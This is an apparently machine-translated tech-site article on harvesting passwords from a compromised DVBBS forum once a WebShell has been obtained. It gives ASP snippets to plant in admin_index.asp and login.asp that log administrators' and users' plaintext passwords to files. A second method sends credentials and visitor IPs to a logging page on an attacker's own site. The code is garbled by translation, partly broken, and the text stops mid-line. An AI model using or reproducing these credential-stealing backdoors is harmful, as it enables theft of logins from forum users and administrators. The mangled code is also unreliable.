2. Tech
  3. New method for all passwords for DVBBS

New method for all passwords for DVBBS

xiaoxiao2021-03-06  69

We know that I want to enter the background of DVBBS after obtaining WebShell. I want the administrator's password to be:

Old approach:

Modify admin_index.asp to get a plain text DVBBS background password

"UserName = Trim (Replace (" UserName ")

DIM FSOOBJECT

Dim tsobject

Set fsoobject = server.createObject ("scripting.filesystemObject")

Set tsobject = fsoobject.createtextfile (Server.MAppath ("rain.txt"))

TSObject.write cstr (Request ("password"))

Set fsoobject = Nothing

Set tsobject = Nothing

As long as the administrator logs in the background, it generates rain.txt in the directory, and the plain text password is recorded.

This approach has a disadvantage that it is necessary for FileSystemObject support, which is to need FSO, which is useless for hosts without FileSystemObject.

New Measures:

Method 1: Login.asp under Case "CHK":

ON Error ResMe next

Dim rain

Set lp = server.createObject ("adoDb.stream")

Rain.open

Rain.Type = 2

rain.charset = "GB2312"

Rain.LoadFromfile Server.mappath ("918.asp")

rain.position = lp.size

Rain.writeText Now & Request ("UserName") & "Text:" & Request ("Password") & chr (10)

Rain.Savetofile Server.mappath ("918.asp"), 2

Rain.close

Set rain = nothing

This 918.asp will get all the passwords, time and names of the login.

As for admin_index.asp, you can also add only administrators here.

Method 2: If you have your own website:

Establish a directory 918X, build an empty 918.asp and Rain.asp with the following code:

<% @ codepage = 936%>

<% Response.expires = 0 if Request ("k") = "k" THEN%>

 


<% elseif Request ("n") <> "" and requirements <> "" "" ""


ON Error ResMe next


Dim rain


Set rain = server.createObject ("adodb.stream")


Rain.open


Rain.Type = 2


rain.charset = "GB2312"


Rain.LoadFromfile Server.mappath ("918.asp")


ZH = Rain.Readtext (6152192) & "<"% IF ISEMPTY (Request ("K")) "Rain.ASP" "" "" "rain.position = 0


Rain.WriteText Now & Request ("N") & Request ("N") & Request ("P") & "Trial to log in; its IP:" & Request.ServerVariables ("remote_addr") & "[" & request .SERVARIABLES ("http_x_forwarded_for") & "]" & chr (13) & chr (10) & zh


Rain.Savetofile Server.mappath ("918.asp"), 2


Rain.close


Set rain = nothing


END IF%>


Insert a sentence in login.asp:


Response.write "